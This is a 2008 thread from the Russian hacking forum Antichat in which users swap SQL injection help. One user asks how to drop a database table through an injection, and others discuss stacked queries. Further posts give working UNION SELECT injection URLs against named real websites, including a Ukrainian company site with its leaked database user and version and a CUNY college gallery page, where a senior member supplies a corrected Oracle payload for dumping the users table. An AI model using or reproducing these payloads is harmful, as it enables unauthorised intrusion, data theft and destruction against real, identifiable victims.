ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
29.05.2008, 13:46
|
|
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
Провел на форуме:
1215706
Репутация:
310
|
|
каким запром при mysql-inj удалить таблицу/базу данных?
id=-1+drop+table+mos_users--
это не катит |
|
|
29.05.2008, 13:54
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918
Репутация:
56
|
|
Сообщение от brasco2k
каким запром при mysql-inj удалить таблицу/базу данных?
это не катит
в контексте "SELECT" никак.
|
|
|
|
29.05.2008, 13:54
|
|
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
Провел на форуме:
1215706
Репутация:
310
|
|
Сообщение от z3r0cool
в контексте "SELECT" никак.
и как быть тогда?
как удалить таблицу/базу данных??
|
|
|
|
29.05.2008, 14:10
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918
Репутация:
56
|
|
Сообщение от brasco2k
и как быть тогда?
как удалить таблицу/базу данных??
если не разделить DROP и SELECT то никак.
|
|
|
|
29.05.2008, 14:08
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
Провел на форуме:
1536533
Репутация:
370
|
|
http://www.mysql.ru/docs/ - хороший сайт
DELETE FROM mag - удалить все записи из mag;
|
|
|
|
29.05.2008, 14:42
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918
Репутация:
56
|
|
Сообщение от Lesnoy_chelovek
http://www.mysql.ru/docs/ - хороший сайт
DELETE FROM mag - удалить все записи из mag;
Разве DELETE можно выполнить в контексте SELECT? 
Можно конечно запихнуть в хранимую функцию и использовать ее в SELECT.
Последний раз редактировалось z3r0cool; 29.05.2008 в 14:53..
|
|
|
|
29.05.2008, 17:35
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
http://www.pconsult.dp.ua/index.php?pn=-1+union+select+1,2,3,4,5/*
user()=pconsult_user@localhost
database()=pconsult_db
version()=4.1.21-standard-log
Делал подбор перебором, но....глухо...
|
|
|
|
29.05.2008, 19:00
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
На100ящий
я вобше 4 версии не люблю..) заепывает искать))
Последний раз редактировалось sabe; 30.05.2008 в 00:43..
|
|
|
|
29.05.2008, 22:27
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
есть вопрос про уязвимость в базе Oracle, при ошибке выдает:
java.sql.SQLException: ORA-01722: invalid number
или
java.sql.SQLException: ORA-01742: comment not terminated properly
http://www.bmcc.cuny.edu/gallery/category.jsp?cat_id=1+union+select+1/*
|
|
|
|
29.05.2008, 23:08
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Код:
http://www.bmcc.cuny.edu/gallery/category.jsp?cat_id=1'+union+select+null,null,null,null,null,null,null,null,null,null+from+users--
Вот тебе вариант хоть както работающего запроса, в таблице users 10 столбцов. Дальше сам.
Твои ошибки - ты не закрыл кавычку рядом с ID, и в оракле комментарий начинающийся с /* должен обязательно закрываться при помощи */ поэтому следует использовать -- .
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 29.05.2008 в 23:12..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|
Похожие темы
Комбинированный вид